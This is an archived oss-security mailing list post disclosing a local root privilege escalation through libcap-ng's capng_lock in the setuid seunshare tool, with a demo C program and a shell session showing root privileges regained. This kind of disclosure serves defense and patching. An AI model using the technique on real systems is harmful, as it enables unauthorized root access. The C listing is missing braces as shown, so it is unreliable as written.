Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 29 Apr 2014 14:20:47 -0700
From: Andy Lutomirski <>
Subject: local privilege escalation due to capng_lock as used in seunshare

cap-ng's capng_lock function is insecure, seunshare uses it, and
seunshare is installed setuid root.

This results in a setuid program like this:

#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <err.h>

int main()
  if (setuid(getuid()) != 0)
    err(1, "setuid(getuid())");

  printf("Dropped privs; real uid is %lu and effective uid is %lu\n",
     (unsigned long)getuid(), (unsigned long)geteuid());


  /* Do something that risks executing untrusted code here */

  if (geteuid() == 0) {
    printf("It's baaaack!\n");
  } else {
    printf("Phew, safe.\n");

  return 0;

behaving like this:

$ ./sesploit
Dropped privs; real uid is 1000 and effective uid is 1000
Phew, safe.

This is okay until an attacker does:

$ seunshare -t . `realpath ./sesploit`
Dropped privs; real uid is 1000 and effective uid is 1000
It's baaaack!

newrole may have the same issue.

This was described recently here:

and has been publicly disclosed in Red Hat's bugzilla for quite some time:

I believe that there is at least one setuid program that can be used
as a vector and is widely installed.

There's a patch here:

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ